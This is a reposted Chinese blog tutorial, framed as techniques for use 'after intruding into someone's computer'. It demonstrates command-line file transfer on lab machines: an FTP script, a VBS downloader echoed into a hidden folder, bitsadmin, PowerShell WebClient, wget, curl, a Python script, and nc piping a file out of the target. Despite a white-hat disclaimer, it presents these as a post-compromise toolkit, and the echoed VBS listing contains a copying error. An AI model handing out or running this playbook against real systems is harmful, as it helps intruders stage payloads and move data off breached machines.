当前位置:   article > 正文

入侵别人电脑后你必须要会的Linux与window系统用命令行下载网络资源的15种方式_任意命令 入侵下载文件

任意命令 入侵下载文件

声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理

看公众号原文点这里

window系统常见下载方式
FTP脚本
vbs脚本
bitsadmin命令
$client命令
Linux系统常见下载方式
wget
curl
lynx
fetch
Axel
aria2
youtube-dl
双方均可用
links
links2
python脚本
nc

没有跳转的均没有演示,可参考文章或自行百度

在这里插入图片描述

实验环境:

  • Windows Server 2008 R2 x64
  • IIS服务器
  • kali

在这里插入图片描述

环境搭建:

安装IIS服务器
C:\inetpub\wwwroot网站目录下放一个www.rar文件并且浏览器能够访问到
在这里插入图片描述

在这里插入图片描述

模拟实验:

Windows命令下载方式

1、FTP脚本实现下载

用echo生成txt文件,ip用户名密码均为目标机的,如下:
在这里插入图片描述
输入ftp -s:ftp.txt执行该文件,成功下载1.rar
在这里插入图片描述

2、vbs脚本实现下载

在桌面创建一个文件夹将vbs脚本放进去,注意修改路径。代码如下:
Set xPost=createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://192.168.70.128/www.rar",0
xPost.Send()
set sGet=createObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write(xPost.ResponseBody)
sGet.SaveToFile "C:\Users\sq\Desktop\a\www.rar",2
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9

在这里插入图片描述
然後双击执行,压缩文件就被下载了
在这里插入图片描述
但人家电脑里不会有这种文件需要你自己生成,方法如下:

进入到一个隐蔽的文件夹,然后用echo语句按顺序输入代码生成vbs脚本,如:
echo Set xPost=createObject("Microsoft.XMLHTTP")>>b.vbs
echo xPost.Open "GET","http://192.168.70.128/www.rar",0 >>b.vbs
echo xPost.Send()>>b.vbs
echo set sGet=createObject("ADODB.Stream")>>b.vbs
echo sGet.Mode=3>>b.vbs
echo sGet.Type=1>>b.vbs
echo sGet.Open()>>b.vbs
echo sGet.Open()>>b.vbs
echo sGet.SaveToFile "C:\Users\sq\Desktop\a\www.rar",2 >>b.vbs

在这里插入图片描述
脚本生成后输入cscript a.vbs执行就可以下载了
在这里插入图片描述

3、bitsadmin命令下载

环境同上,直接输入bitsadmin /transfer n http://192.168.70.128/www.rar C:\Users\sq\Desktop\a\www.rar即可实现下载
在这里插入图片描述
成功下载
在这里插入图片描述

4、$client命令下载

环境同上,在搜索框中输入p然后以管理员身份运行poershell
在这里插入图片描述
在命令行中依次打入
$client = new-object System.Net.WebClient
$client.DownloadFile('http://192.168.70.128/www.rar','C:\Users\sq\Desktop\www.rar')
前面是网站路径,后面是保存路径,文件名可换
在这里插入图片描述

Linux命令下载方式

1、wget命令下载

这个使用起来很简单,直接输入wget+网址就可以了,加-p参数还可以指定文件夹,如果文件夹不存在会自动创建
在这里插入图片描述

2、curl命令下载

这个命令需要在网址后加–output参数,后面跟文件名即可
在这里插入图片描述

3、python脚本实现下载

创建一个xiazai.py文件修改地址然后执行即可,python代码如下:

#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://192.168.70.128/www.rar')
localFile = open('1.rar', 'w')
localFile.write(u.read())
localFile.close()
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6

在这里插入图片描述

4、nc命令下载

这个方法需要两台机器都有nc,然后目标服务器开放端口,自己在进行接收就可以了,方法如下:

我们开启两个终端,当做是两台服务器,目标端输入cat 1.rar | nc -lvvp 1234开始监听,本地输入nc 127.0.0.1 1234 > 1.rar接收
注意:这里因为是一台机器演示所以用127.0.0.1,真实情况换成网站地址或ip即可,还有执行完后它不会自动退出,你感觉下载完了就Ctrl+C终止
在这里插入图片描述
下完后我们可以ls -l看一下文件字节数是否相同
在这里插入图片描述

欢迎关注公众号,原创不易,转载请注明来源哦

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小小林熬夜学编程/article/detail/175362
推荐阅读
相关标签